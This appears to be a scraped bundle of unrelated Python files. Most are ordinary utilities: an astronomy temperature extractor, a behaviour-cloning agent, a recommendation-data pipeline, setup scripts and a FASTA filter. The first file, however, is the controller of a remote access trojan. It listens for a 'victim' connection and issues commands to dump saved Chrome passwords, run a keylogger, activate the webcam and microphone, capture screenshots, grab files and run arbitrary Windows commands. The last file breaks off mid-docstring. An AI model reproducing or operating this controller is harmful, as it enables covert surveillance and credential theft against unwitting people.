FiRsT TiMe? TyPe \'CoN-mE\' fOr HeLp
"""
def functions():
print '\nNB: When connected to victim, you can run any windows commands remotely\neg. shutdown'
print '\n----------------------------------------------------------'
print '\t\tConTroll Options'
print '----------------------------------------------------------'
print 'start-trolling --> Wait for a victim to be hooked'
print 'stop-trolling --> Disconnect from victim'
print '----------------------------------------------------------'
print '\nUse these added Commands to Con/Troll the Victim\n'
print 'about --> Get information about victim\'s machine'
print 'activateWebcam --> Active Victim\'s webcam'
print 'activateMic --> Active Victim\'s microphone'
print 'chromeDump --> Steal saved passwords stored in chrome'
print 'getLogFile --> Get Keylogger file with logged keys'
print 'getRecording --> Retrieve microphone recording from victim'
print 'grab <arg> --> Grab a file from the victim\'s machine'
print 'kill --> Kill any process running on victim\'s machine'
print 'lockScreen --> Lock Victim\'s screen'
print 'openDrive --> Open\'s victim CD drive'
print 'screencap --> Get a screen shot of the victim\'s desktop'
print 'startLogger --> Start keylogger'
print 'speak--<text> --> Victim\'s machine talks with custom text passed'
print 'stopLogger --> Stop keylogger'
print '\ntroll--<Troll message>--<buttonCode+iconCode>--<Popup title>--<# of popus> --> Troll victim with pop ups\n'
print """button Codes - Icon Codes
0: Normal message box 16: Critical message icon
1: OK and Cancel 32: Warning query icon
2: Abort, Retry, Ignore 48: Warning message icon
3: Yes, No, Cancel 64: Information message icon
4: Yes and No 4096: Always on top of the desktop
5: Retry and Cancel
"""
def webCam(connection, command, ip_address):
connection.send(command)
while True:
soc = socket.socket()
soc.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
soc.bind((ip_address, 9900)) #bind on all interface to port 9900
soc.listen(1) #listen for one connection
conn, addr = soc.accept() #accept connection
message = [] #variable to hold the data
while True:
d = conn.recv(1024 * 1024) #receive this much data
if not d: break
message.append(d)
data = ''.join(message) #assemble the entire data
numpy_data = numpy.fromstring(data, numpy.uint8) #convert to its original format
decimg = cv2.imdecode(numpy_data, 1) #read image from memory buffer(numpy_data)
cv2.imshow("Remote WebCam", decimg) #display image
if cv2.waitKey(5) == 27: break #close if user presses 'ESC'
cv2.destroyAllWindows()
def transfer(conn,command):
conn.send(command)
f = open('test.png','wb')
while True:
bits = conn.recv(1024)
if 'Unable to find out the file' in bits:
print '[-] Unable to find out the file'
break
if bits.endswith('DONE'):
print '[+] Transfer completed '
f.close()
break
elif bits.endswith('captured'):
print '[+] Transferring Screen Shot of Victim...'
time.sleep(2)
print '\n[+] Transfer completed '
f.close()
break
elif bits.endswith('LogSent'):
print '[+] Transferring KeyLog File...'
time.sleep(2)
print '\n[+] Transfer completed '
f.close()
break
elif bits.endswith('DumpSent'):
print '[+] Transferring Chrome Login Data File...'
time.sleep(2)
print '\n[+] Transfer completed '
f.close()
break
f.write(bits)
def transferChromeDump(conn,command):
conn.send(command)
f = open('ChromeLoginData.txt','wb')
while True:
bits = conn.recv(1024)
if 'Chrome Doesn\'t exists' in bits:
print '[-] Chrome Doesn\'t exists'
break
elif bits.endswith('DumpSent'):
print '[+] Transferring Chrome Login Data File...'
time.sleep(2)
print '\n[+] Transfer completed '
f.close()
break
f.write(bits)
def recordMic(conn,command):
conn.send(command)
f = open('audio.wav','wb')
while True:
bits = conn.recv(1024)
if bits.endswith('recordingSent'):
print '[+] Transferring Recoreded Audio...'
time.sleep(2)
print '\n[+] Transfer completed '
f.close()
break
f.write(bits)
def snapshot(conn,command):
conn.send(command)
f = open('snapshot.png','wb')
while True:
bits = conn.recv(1024)
if bits.endswith('snapSent'):
print '\n[+] Snap Taken '
f.close()
break
f.write(bits)
def connect(ip_address):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((ip_address, 8080))
s.listen(1)
print '[+] Listening for incoming TCP connection on port 8080'
conn, addr = s.accept()
print '[+] We got a connection from: ', addr
while True:
command = raw_input("Shell> ")
if 'stop-trolling' in command:
conn.send('terminate')
conn.close()
return 1
elif 'grab' in command:
transfer(conn,command)
elif 'screencap' in command:
transfer(conn, command)
elif 'getLogFile' in command:
transfer(conn, command)
elif 'CoN-mE' in command:
functions()
elif 'getWebcam' in command:
transfer(conn, command)
elif 'activateWebcam' in command:
webCam(conn, command, ip_address)
elif 'getRecording' in command:
recordMic(conn, command)
elif 'chromeDump' in command:
transferChromeDump(conn, command)
elif 'send' in command:
image = command.split(' ')
transferImage(conn, image[1], command)
elif 'snapshot' in command:
snapshot(conn, command)
elif 'cls' in command:
os.system('cls')
print banner
print '[+] Listening for incoming TCP connection on port 8080'
print '[+] We got a connection from: ', addr
elif 'troll' in command:
try:
call, msg, icons, title, times = command.split('--')
conn.send(command)
except:
print 'Usage troll--<Troll message>--<buttonCode+iconCode>--<Popup title>--<# of popus>\neg. troll--"You\'ve been p0wned"--0+16+4096--"trolled"--120\ntype \'CoN-mE\' for more information'
else:
conn.send(command)
print conn.recv(1024)
def main ():
os.system('cls')
print banner
while True:
cmd = raw_input('> ')
if cmd == 'CoN-mE':
functions()
elif cmd == 'start-trolling':
ip_address = raw_input('> IP Address: ')
if connect(ip_address) == 1:
os.system('cls')
print banner
print 'Hope You Had Fun!'
break
else:
main()
if __name__ == '__main__':
main()
|
#Ex02
dic = {} #空のディクショナリを用意
while True: #無限に繰り返す
key = input("キーを入力してください: ")
if key == "END": #入力されたのは "END" か?
break
val = input("値を入力してください: ")
dic[key] = val #ディクショナリ(dic)にキーと値の組を格納(追加)
#すべてのキーいついてキーと値の組を表示
for k,v in dic.items():
print(k,v)
|
#!/usr/bin/env python
import astropy.io.fits as pyfits
import numpy as np
import sys
import datetime
import dateutil.parser
file=open("temperatures.txt","w")
skeys=["DAY","EXPNUM","TIME","HOUR","EXPREQ","BLUTEMP","REDTEMP","NIRTEMP","PLCTEMP1","PLCTEMP2","EXPSHUT","HARTL","HARTR","BLUHUMID","REDHUMID","NIRHUMID","RCCDTEMP1","RCCDTEMP2","ZCCDTEMP1","ZCCDTEMP2"]
line="#"
for k in skeys :
line=line+" %s"%k
file.write("%s\n"%line)
dtref=dateutil.parser.parse("2017-01-01T00:00:00.000000-05:00")
for filename in sys.argv[1:] :
h=pyfits.open(filename)
speckeys=h["SPECTCON1"].columns.names
if not "REDTEMP" in speckeys :
continue
d={}
d["EXPNUM"]=h[0].header["EXPNUM"]
d["EXPREQ"]=h[0].header["EXPREQ"]
dt = dateutil.parser.parse(h[0].header["DATE-OBS"])
d["DAY"]=int(dt.strftime('%Y%m%d'))
d["TIME"]=(dt.timestamp()-dtref.timestamp())
offset=0 # I think to the time zone is wrong here
d["HOUR"]=int(dt.strftime('%H'))+float(dt.strftime('%M'))/60.+float(dt.strftime('%S'))/3600.+offset
if "R1" in h :
d["RCCDTEMP1"]=h["R1"].header["CCDTEMP1"]
d["RCCDTEMP2"]=h["R1"].header["CCDTEMP2"]
else :
d["RCCDTEMP1"]=0.
d["RCCDTEMP2"]=0.
if "Z1" in h :
d["ZCCDTEMP1"]=h["Z1"].header["CCDTEMP1"]
d["ZCCDTEMP2"]=h["Z1"].header["CCDTEMP2"]
else :
d["ZCCDTEMP1"]=0.
d["ZCCDTEMP2"]=0.
if "PLC" in h :
temps=h["PLC"].header["TEMPS"].split(",")
d["PLCTEMP1"]=float(temps[0])
d["PLCTEMP2"]=float(temps[1])
else :
d["PLCTEMP1"]=0.
d["PLCTEMP2"]=0.
for k in ["BLUTEMP","REDTEMP","NIRTEMP","BLUHUMID","REDHUMID","NIRHUMID"] :
d[k]=h["SPECTCON1"].data[k][0]
d["EXPSHUT"]=int(h["SPECTCON1"].data["EXPSHUT"][0]=="CLOSED")
d["HARTL"]=int(h["SPECTCON1"].data["HARTL"][0]=="OPEN")
d["HARTR"]=int(h["SPECTCON1"].data["HARTR"][0]=="OPEN")
line=""
for k in skeys :
line=line+" %s"%str(d[k])
print(line)
file.write("%s\n"%line)
file.close()
|
from collections import OrderedDict
import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
from torch.utils.data.sampler import SubsetRandomSampler
from torch.optim.lr_scheduler import StepLR
from .base_agent import BaseAgent
from .expert_dataset import ExpertDataset
from ..networks import Actor
from ..utils.info_dict import Info
from ..utils.logger import logger
from ..utils.mpi import mpi_average
from ..utils.pytorch import (
optimizer_cuda,
count_parameters,
compute_gradient_norm,
compute_weight_norm,
sync_networks,
sync_grads,
to_tensor,
)
class BCAgent(BaseAgent):
def __init__(self, config, ob_space, ac_space, env_ob_space):
super().__init__(config, ob_space)
self._ob_space = ob_space
self._ac_space = ac_space
self._epoch = 0
self._actor = Actor(config, ob_space, ac_space, config.tanh_policy)
self._network_cuda(config.device)
self._actor_optim = optim.Adam(self._actor.parameters(), lr=config.bc_lr)
self._actor_lr_scheduler = StepLR(
self._actor_optim, step_size=self._config.max_global_step // 5, gamma=0.5,
)
if config.is_train:
self._dataset = ExpertDataset(
config.demo_path,
config.demo_subsample_interval,
ac_space,
use_low_level=config.demo_low_level,
sample_range_start=config.demo_sample_range_start,
sample_range_end=config.demo_sample_range_end,
)
if self._config.val_split != 0:
dataset_size = len(self._dataset)
indices = list(range(dataset_size))
split = int(np.floor((1 - self._config.val_split) * dataset_size))
train_indices, val_indices = indices[split:], indices[:split]
train_sampler = SubsetRandomSampler(train_indices)
val_sampler = SubsetRandomSampler(val_indices)
self._train_loader = torch.utils.data.DataLoader(
self._dataset,
batch_size=self._config.batch_size,
sampler=train_sampler,
)
self._val_loader = torch.utils.data.DataLoader(
self._dataset,
batch_size=self._config.batch_size,
sampler=val_sampler,
)
else:
self._train_loader = torch.utils.data.DataLoader(
self._dataset, batch_size=self._config.batch_size, shuffle=True
)
self._log_creation()
def _log_creation(self):
if self._config.is_chef:
logger.info("Creating a BC agent")
logger.info("The actor has %d parameters", count_parameters(self._actor))
def state_dict(self):
return {
"actor_state_dict": self._actor.state_dict(),
"actor_optim_state_dict": self._actor_optim.state_dict(),
"ob_norm_state_dict": self._ob_norm.state_dict(),
}
def load_state_dict(self, ckpt):
self._actor.load_state_dict(ckpt["actor_state_dict"])
self._ob_norm.load_state_dict(ckpt["ob_norm_state_dict"])
self._network_cuda(self._config.device)
self._actor_optim.load_state_dict(ckpt["actor_optim_state_dict"])
optimizer_cuda(self._actor_optim, self._config.device)
def _network_cuda(self, device):
self._actor.to(device)
def sync_networks(self):
sync_networks(self._actor)
def train(self):
train_info = Info()
for transitions in self._train_loader:
_train_info = self._update_network(transitions, train=True)
train_info.add(_train_info)
self._epoch += 1
self._actor_lr_scheduler.step()
train_info.add(
{
"actor_grad_norm": compute_gradient_norm(self._actor),
"actor_weight_norm": compute_weight_norm(self._actor),
}
)
train_info = train_info.get_dict(only_scalar=True)
logger.info("BC loss %f", train_info["actor_loss"])
return train_info
def evaluate(self):
if self._val_loader:
eval_info = Info()
for transitions in self._val_loader:
_eval_info = self._update_network(transitions, train=False)
eval_info.add(_val_info)
self._epoch += 1
return eval_info.get_dict(only_scalar=True)
logger.warning("No validation set available, make sure '--val_split' is set")
return None
def _update_network(self, transitions, train=True):
info = Info()
# pre-process observations
o = transitions["ob"]
o = self.normalize(o)
# convert double tensor to float32 tensor
_to_tensor = lambda x: to_tensor(x, self._config.device)
o = _to_tensor(o)
ac = _to_tensor(transitions["ac"])
if isinstance(ac, OrderedDict):
ac = list(ac.values())
if len(ac[0].shape) == 1:
ac = [x.unsqueeze(0) for x in ac]
ac = torch.cat(ac, dim=-1)
# the actor loss
pred_ac, _ = self._actor(o)
if isinstance(pred_ac, OrderedDict):
pred_ac = list(pred_ac.values())
if len(pred_ac[0].shape) == 1:
pred_ac = [x.unsqueeze(0) for x in pred_ac]
pred_ac = torch.cat(pred_ac, dim=-1)
diff = ac - pred_ac
actor_loss = diff.pow(2).mean()
info["actor_loss"] = actor_loss.cpu().item()
info["pred_ac"] = pred_ac.cpu().detach()
info["GT_ac"] = ac.cpu()
diff = torch.sum(torch.abs(diff), axis=0).cpu()
for i in range(diff.shape[0]):
info["action" + str(i) + "_L1loss"] = diff[i].mean().item()
if train:
# update the actor
self._actor_optim.zero_grad()
actor_loss.backward()
# torch.nn.utils.clip_grad_norm_(self._actor.parameters(), self._config.max_grad_norm)
sync_grads(self._actor)
self._actor_optim.step()
return mpi_average(info.get_dict(only_scalar=True))
|
import pickle
import time
import numpy as np
import copy
import os
import random
from constants import *
# data
# user_id \t os_name \t search_record1 \t search_record2 \t ...
# search_record: time_poiid_poiloc_poiname_poitype_userloc_network
"""
step3: make the final dataset files for transfer learning process and meta-learning.
For meta-learning, the output is 'mtrain_tasks.pkl' 'mvalid_tasks.pkl' 'mtest_tasks.pkl'
"""
start = time.time()
def timestr_to_timeid(timestr):
if len(timestr) > 5:
return time.strptime(timestr, "%Y-%m-%d %H:%M:%S").tm_hour+1 # 1~24
else: # when timestr is the default value: '\\N'
return 0
def timestr_to_timestamp(timestr):
return int(time.mktime(time.strptime(timestr, '%Y-%m-%d %H:%M:%S')))
def cal_distance(coo1, coo2):
x1, y1 = coo1[1:-1].split(",")
x2, y2 = coo2[1:-1].split(",")
dist = (float(x1) - float(x2)) ** 2 + (float(y1) - float(y2)) ** 2
if dist > 1e7:
dist = 1e7
return dist
def cal_dtime(last_timestr, timestr):
last_timestamp = timestr_to_timestamp(last_timestr)
timestamp = timestr_to_timestamp(timestr)
dtime = timestamp - last_timestamp
return dtime
def get_mean_std(arr):
arr = np.array(arr)
mean = np.mean(arr)
std = np.std(arr)
return mean, std
def record_to_datapoint(record):
record = record.split("_")
datapoint = [int(record[1]), int(record[4]), timestr_to_timeid(record[0])]
return datapoint, record[0], record[2], record[-2] # [poiid, poitype, timeid], timestr, poi_loc, user_loc
def pad_one_seq(x, max_context):
context_element_len = len(x[0])
ret = [ [0]*context_element_len ] * (max_context-len(x)) + x
return np.array(ret)[-max_context:]
def get_user_num(dataset):
if "meta_training" in dataset:
return TRAIN_USER_NUM
else:
return TEST_USER_NUM
def read_dataset(dataset, min_hist=MIN_HIST):
task_user2samples = {} # all real samples of this task, each sample is a numpy array as [uid, hist, candi, label] (label always =1)
task_candidates = set() # all the tuple of (POI id, POI type) in this task
user2itemset = {} # key: each user in this task, value: a set() of all POI id he/she has clicked.
dists = []
dtimes = []
user_num = get_user_num(dataset)
with open(split_path + dataset, 'r', encoding='utf-8') as fin:
for cnt, line1 in enumerate(fin):
if cnt >= user_num:
break
arr1 = line1.strip().split("\t") # each line is a sequence for a user
uid = int(arr1.pop(0))
arr1.pop(0) # skip os_name
user2itemset[uid] = set()
context = []
user_loc_context = []
last_timestr = "NULL"
for i in range(0, len(arr1)):
datapoint, timestr, poi_loc, user_loc = record_to_datapoint(arr1[i])
dist = cal_distance(poi_loc, user_loc)
dists.append(dist)
if i == 0:
context.append(datapoint + [dist, 0]) # poi id, poi type, timeid, dist, dtime
else:
dtime = cal_dtime(last_timestr, timestr)
dtimes.append(dtime)
context.append(datapoint + [dist, dtime])
candi_tuple = tuple([datapoint[0], datapoint[1], poi_loc]) # poi id, poi type, poi loc
task_candidates.add(candi_tuple)
user2itemset[uid].add(candi_tuple)
last_timestr = timestr
user_loc_context.append(user_loc)
for j in range(0, len(arr1) - min_hist):
hist = np.array(pad_one_seq(context[0:min_hist+j], MAX_HIST), dtype='int32')
candi = np.array(context[min_hist+j], dtype='int32')
sample = np.array([uid, hist, candi, user_loc_context[min_hist+j], 1]) # sample: user, history, candidate (poiid, poitype, timeid, u-pdist, dtime), user_location(str), label
if uid in task_user2samples:
task_user2samples[uid].append(sample)
else:
task_user2samples[uid] = [sample]
task_candidates = list(task_candidates)
mean_stds = {}
mean_stds["dist"] = mean_dist, std_dist = get_mean_std(dists)
mean_stds["dtime"] = mean_dtime, std_dtime = get_mean_std(dtimes)
# print(mean_stds)
data = task_user2samples, task_candidates, user2itemset, mean_stds
# pickle.dump(data, open(the_data_file, 'wb'), protocol=4)
return data
def read_transfer_data(datasets, neg_num=1, min_hist=MIN_HIST, is_test_qry=False): # min_hist是为了区别spt样本和qry样本的历史序列长度
for i in range(len(datasets)):
city = datasets[i].split('_')[0]
# print("city:", city)
task_user2pos_samples, task_candidates, user2itemset, mean_stds = read_dataset(datasets[i], min_hist)
# print("# task_candidates:", len(task_candidates))
user_list = []
history_list = []
candidate_list = []
label_list = []
test_qry_samples = [] # this is for the alignment of evaluations for trasfer learning and meta-learning methods.
for user in task_user2pos_samples:
for pos_sample in task_user2pos_samples[user]:
user_id, hist, pos_candi, user_loc, label = pos_sample
for k in range(1 + neg_num):
user_list.append(user_id)
history_list.append(hist)
candidate_list.append(pos_candi)
label_list.append(1)
neg_candis = []
neg_qry_samples = []
for k in range(neg_num):
neg_candi = random.choice(task_candidates)
while neg_candi in user2itemset[user_id] or neg_candi in neg_candis:
neg_candi = random.choice(task_candidates)
neg_candis.append(neg_candi) # tuple (poiid, poitype, poiloc)
poiid, poitype, poi_loc = neg_candi
# candidate (poiid, poitype, timeid, u-pdist, dtime)
neg_candi = np.array([poiid, poitype, pos_candi[2], cal_distance(poi_loc, user_loc), pos_candi[4]])
candidate_list.append(neg_candi)
label_list.append(0)
if is_test_qry:
neg_qry_samples.append(np.array([user_id, hist, neg_candi, 0]))
if is_test_qry:
pos_sample = user_id, hist, pos_candi, label
test_qry_samples.extend([pos_sample] + neg_qry_samples)
if is_test_qry:
pickle.dump(test_qry_samples, open(split_path + city + "_test_qry_samples.pkl", 'wb'), protocol=4)
pickle.dump(mean_stds, open(save_path + city + "_mean_stds.pkl", 'wb'), protocol=4)
yield np.array(user_list, dtype='int32'), np.array(history_list, dtype='int32'), \
np.array(candidate_list, dtype='int32'), np.array(label_list, dtype='int32')
def save_train_and_valid(data, city, mode, valid_ratio=0.05):
x_train_uid, x_train_history, x_train_candi, y_train = data
train_filename = "{}_{}_train.pkl".format(city, mode)
valid_filename = "{}_{}_dev.pkl".format(city, mode)
TRAIN_SAMPLE_NUM = int(len(x_train_uid) * (1 - valid_ratio))
pickle.dump([x_train_uid[:TRAIN_SAMPLE_NUM], x_train_history[:TRAIN_SAMPLE_NUM], x_train_candi[:TRAIN_SAMPLE_NUM],
y_train[:TRAIN_SAMPLE_NUM]], open(save_path + train_filename, 'wb'), protocol=4)
pickle.dump([x_train_uid[TRAIN_SAMPLE_NUM:], x_train_history[TRAIN_SAMPLE_NUM:], x_train_candi[TRAIN_SAMPLE_NUM:],
y_train[TRAIN_SAMPLE_NUM:]], open(save_path + valid_filename, 'wb'), protocol=4)
def save_test(data, city):
x_test_uid, x_test_history, x_test_candi, y_test = data
test_filename = "{}_target_test.pkl".format(city)
pickle.dump([x_test_uid, x_test_history, x_test_candi, y_test], open(save_path + test_filename, 'wb'), protocol=4)
def generate_base_cities(cities):
datasets = list(map(lambda x: x + "_meta_training_query.txt", cities))
for i, data in enumerate(read_transfer_data(datasets, neg_num=1)):
save_train_and_valid(data, cities[i], 'base')
def generate_valid_cities_as_train(cities):
spt_datasets = list(map(lambda x: x + "_meta_testing_support.txt", cities))
qry_datasets = list(map(lambda x: x + "_meta_testing_query.txt", cities))
data_collect = [[] for i in range(len(cities))]
for i, data in enumerate(read_transfer_data(spt_datasets, neg_num=1)):
data_collect[i].append(data)
for i, data in enumerate(read_transfer_data(qry_datasets, neg_num=1, min_hist=MIN_HIST+SPT_SIZE)):
data_collect[i].append(data)
for i in range(len(cities)):
spt_data, qry_data = data_collect[i]
data = []
for j in range(4): # x_train_uid, x_train_history, x_train_candi, y_train = data
data.append(np.concatenate(np.array([spt_data[j], qry_data[j]]), axis=0))
save_train_and_valid(data, cities[i], 'base')
def generate_target_cities(cities):
spt_datasets = list(map(lambda x: x + "_meta_testing_support.txt", cities))
qry_datasets = list(map(lambda x: x + "_meta_testing_query.txt", cities))
for i, data in enumerate(read_transfer_data(spt_datasets, neg_num=1)):
save_train_and_valid(data, cities[i], 'target')
for i, data in enumerate(read_transfer_data(qry_datasets, neg_num=100, min_hist=MIN_HIST+SPT_SIZE, is_test_qry=True)):
save_test(data, cities[i])
def read_meta_training_data(cities):
spt_datasets = list(map(lambda x: x + "_meta_training_support.txt", cities))
qry_datasets = list(map(lambda x: x + "_meta_training_query.txt", cities))
mtrain_tasks = []
for i in range(len(cities)):
spt_user2samples, spt_candidates, spt_user2itemset, spt_mean_stds = read_dataset(spt_datasets[i])
qry_user2samples, qry_candidates, qry_user2itemset, qry_mean_stds = read_dataset(qry_datasets[i], min_hist=MIN_HIST+SPT_SIZE)
task_candidates = list(set(spt_candidates) | set(qry_candidates))
mtrain_tasks.append((spt_user2samples, qry_user2samples, task_candidates, qry_user2itemset, qry_mean_stds, cities[i]))
return mtrain_tasks
def read_meta_testing_data(cities, is_test=False):
spt_datasets = list(map(lambda x: x + "_meta_testing_support.txt", cities))
qry_datasets = list(map(lambda x: x + "_meta_testing_query.txt", cities))
mtest_tasks = []
for i in range(len(spt_datasets)):
spt_user2samples, spt_candidates, spt_user2itemset, spt_mean_stds = read_dataset(spt_datasets[i])
qry_user2samples, qry_candidates, qry_user2itemset, qry_mean_stds = read_dataset(qry_datasets[i], min_hist=MIN_HIST+SPT_SIZE)
task_candidates = list(set(spt_candidates) | set(qry_candidates))
if is_test:
city = cities[i]
align_qry_samples = pickle.load(open(split_path + city + "_test_qry_samples.pkl", 'rb'))
mtest_tasks.append((spt_user2samples, qry_user2samples, task_candidates, qry_user2itemset, qry_mean_stds, cities[i], align_qry_samples))
else:
mtest_tasks.append((spt_user2samples, qry_user2samples, task_candidates, qry_user2itemset, qry_mean_stds, cities[i]))
return mtest_tasks
def generate_trans():
generate_base_cities(base_cities)
generate_target_cities(target_cities)
generate_valid_cities_as_train(valid_cities)
def generate_meta():
pickle.dump(read_meta_training_data(base_cities), open(save_path + "mtrain_tasks.pkl", 'wb'), protocol=4)
pickle.dump(read_meta_testing_data(valid_cities), open(save_path + "mvalid_tasks.pkl", 'wb'), protocol=4)
pickle.dump(read_meta_testing_data(target_cities, is_test=True), open(save_path + "mtest_tasks.pkl", 'wb'), protocol=4)
if not os.path.exists(save_path):
os.mkdir(save_path)
base_cities = get_cities('base')
valid_cities = get_cities('valid')
target_cities = get_cities('target')
print("generate the final dataset for transfer methods.")
generate_trans()
print("generate the final dataset for meta-learning methods.")
generate_meta()
end = time.time()
print("cost time:", (end-start)/60, "min")
|
"""
Copyright 2020 Lightbend Inc.
Licensed under the Apache License, Version 2.0.
"""
import os
import pathlib
from setuptools import find_packages, setup
# Load version in akkaserverless package.
from setuptools.command.build_py import build_py
exec(open("akkaserverless/version.py").read())
PROTOBUF_VERSION = "master"
version = __version__ # noqa
name = "akkaserverless"
print(f"package name: {name}, version: {version}", flush=True)
proto_lib_roots = ["akkaserverless"]
#proto_roots = ["akkaserverless"]
class FetchBuildProtosCommand(build_py):
"""fetch libs and install the protocol buffer generated sources."""
def run(self):
os.system(f"scripts/prepare.sh {PROTOBUF_VERSION}")
for proto_root in proto_lib_roots:
for root, subdirs, files in os.walk(proto_root):
for file in [f for f in files if f.endswith(".proto")]:
file_path = pathlib.Path(root) / file
destination = "."
print(f"compiling {file_path} to {destination}")
command = f"python -m grpc_tools.protoc {' '.join([' -I ' + i for i in proto_lib_roots])} --python_out={proto_root} --grpc_python_out={proto_root} {file_path}" # noqa
os.system(command)
# the hacking to get files matched up
file_wo_ext = str(file_path).replace(".proto", "")
command = f"perl -i -pe 's/from akkaserverless/from akkaserverless.akkaserverless/g' {file_wo_ext}_pb2.py"
os.system(command)
command = f"perl -i -pe 's/from akkaserverless/from akkaserverless.akkaserverless/g' {file_wo_ext}_pb2_grpc.py"
os.system(command)
return super().run()
packages = find_packages(exclude=[])
print(f"packages: {packages}")
setup(
name=name,
version=version,
url="https://github.com/jpollock/akkaserverless-python-sdk",
license="Apache 2.0",
description="Akka Serverless Python Support Library",
packages=packages,
package_data={
"": ["*.proto"],
"": []
},
#long_description=open("Description.md", "r").read(),
#long_description_content_type="text/markdown",
zip_safe=False,
scripts=["bin/fetch-akkaserverless-pb.sh", "bin/compile.sh", "bin/prepare.sh", "bin/start.sh", "bin/docker_build.sh", "bin/docker_push.sh"],
install_requires=[
"attrs>=19.3.0",
"google-api>=0.1.12",
"googleapis-common-protos >= 1.51.0",
"grpcio>=1.31.0",
"grpcio-tools>=1.31.0",
"protobuf>=3.11.3",
"pytest>=6.2.4",
"six>=1.14.0",
"grpcio-reflection>=1.31.0",
"docker",
],
cmdclass={
"build_py": FetchBuildProtosCommand,
},
)
|
# coding: utf-8
"""
Xero Payroll AU API
This is the Xero Payroll API for orgs in Australia region. # noqa: E501
Contact: api@xero.com
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
from xero_python.models import BaseModel
class SuperFunds(BaseModel):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {"super_funds": "list[SuperFund]"}
attribute_map = {"super_funds": "SuperFunds"}
def __init__(self, super_funds=None): # noqa: E501
"""SuperFunds - a model defined in OpenAPI""" # noqa: E501
self._super_funds = None
self.discriminator = None
if super_funds is not None:
self.super_funds = super_funds
@property
def super_funds(self):
"""Gets the super_funds of this SuperFunds. # noqa: E501
:return: The super_funds of this SuperFunds. # noqa: E501
:rtype: list[SuperFund]
"""
return self._super_funds
@super_funds.setter
def super_funds(self, super_funds):
"""Sets the super_funds of this SuperFunds.
:param super_funds: The super_funds of this SuperFunds. # noqa: E501
:type: list[SuperFund]
"""
self._super_funds = super_funds
|
from reef import create_app
application = create_app()
|
class American:
@staticmethod
def printNationality():
print('America')
American.printNationality()
American().printNationality()
|
#!/usr/bin/python
import gendsession
class MySubClassExample(gendsession.GEndSessionListenerBase):
def end_session_actions(self):
print "Performing user specified logout actions"
example = MySubClassExample()
example.start()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Chery pick of fasta sequences satisfying a query string in their header/name
import argparse
from Bio import SeqIO
def Parser():
the_parser = argparse.ArgumentParser(
description='Cherry pick fasta sequences')
the_parser.add_argument('--input', action='store', type=str,
help='input fasta file')
the_parser.add_argument('--searchfor', action='store', type=str,
help='with, without, or withlist, withoutlist')
the_parser.add_argument('--mode', action='store', type=str,
default='includes', help='exact or includes')
the_parser.add_argument('--query-string', dest='query_string',
action='store', type=str,
help='headers containing the string will be \
extracted or excluded as well as the \
corresponding sequence')
the_parser.add_argument('--query-file', dest='query_file',
action='store', type=str,
help='headers containing any of the strings \
provided in the text file (1 string per \
line) will be extracted or excluded as well \
as the corresponding sequence')
the_parser.add_argument('--output', action='store', type=str,
help='output fasta file')
args = the_parser.parse_args()
return args
def parse_fasta_dict(query, fasta_dict, mode):
if not isinstance(query, list):
query = [query]
accumulator = []
if mode == 'includes':
for seq_id in fasta_dict:
for string in query:
if string in seq_id:
accumulator.append(seq_id)
continue
elif mode == 'exact':
for seq_id in fasta_dict:
for string in query:
if string == seq_id:
accumulator.append(seq_id)
continue
res_dict = {k: fasta_dict[k] for k in fasta_dict if k in accumulator}
return res_dict
def complement_fasta_dict(fasta_dict, subfasta_dict):
fasta_ids = list(fasta_dict.keys())
subfasta_ids = list(subfasta_dict.keys())
complement_ids = list(set(fasta_ids) - set(subfasta_ids))
sub_dict = {k: fasta_dict[k] for k in fasta_dict if k in complement_ids}
return sub_dict
def getquerylist(file):
querylist = []
for line in open(file, 'r'):
querylist.append(line.rstrip())
return querylist
def buid_fasta_dict(fasta):
seq_dict = {rec.id: rec.seq for rec in SeqIO.parse(fasta, "fasta")}
return seq_dict
def write_fasta_result(fasta_dict, file):
line_length = 60
with open(file, 'w') as f:
for header in sorted(fasta_dict):
f.write('>%s\n' % header)
if len(fasta_dict[header]) <= line_length:
f.write('%s\n' % fasta_dict[header])
else:
for i in range(line_length, len(fasta_dict[header]),
line_length):
f.write('%s\n' % fasta_dict[header][i-line_length:i])
f.write('%s\n' % fasta_dict[header][i:])
def __main__():
''' main function '''
args = Parser()
fasta_dict = buid_fasta_dict(args.input)
if args.query_string:
query = args.query_string
elif args.query_file:
query = getquerylist(args.query_file)
if args.searchfor == 'with':
fasta_result_dict = parse_fasta_dict(query, fasta_dict, args.mode)
elif args.searchfor == 'without':
fasta_result_dict = complement_fasta_dict(fasta_dict, parse_fasta_dict(
query, fasta_dict,
args.mode))
write_fasta_result(fasta_result_dict, args.output)
if __name__ == '__main__':
__main__()
|
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
config = {
'description': 'Python Connector for Mongrel2',
'author': 'Zed A. Shaw',
'url': 'http://pypi.python.org/pypi/mongrel2-python',
'download_url': 'http://pypi.python.org/pypi/mongrel2-python',
'author_email': 'zedshaw@zedshaw.com',
'version': '1.7.5',
'install_requires': ['nose', 'simplejson', 'pyrepl', 'storm'],
'packages': ['mongrel2', 'mongrel2.config'],
'package_data': {'mongrel2': ['sql/config.sql']},
'scripts': ['bin/m2shpy'],
'name': 'm2py'
}
setup(**config)
|
from src.renderers.teams import TeamsRenderer
# have to replace above with the football equivalents
class Scoreboard:
def __init__(self, canvas, data):
self.canvas = canvas
self.data = data
def render(self):
TeamsRenderer(self.canvas, self.data).render()
# NetworkErrorRenderer(self.canvas, self.data).render()
|
#!/usr/bin/env python
# Copyright 2012 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
"""Runs a command with optional isolated input/output.
Despite name "run_isolated", can run a generic non-isolated command specified as
args.
If input isolated hash is provided, fetches it, creates a tree of hard links,
appends args to the command in the fetched isolated and runs it.
To improve performance, keeps a local cache.
The local cache can safely be deleted.
Any ${EXECUTABLE_SUFFIX} on the command line will be replaced with ".exe" string
on Windows and "" on other platforms.
Any ${ISOLATED_OUTDIR} on the command line will be replaced by the location of a
temporary directory upon execution of the command specified in the .isolated
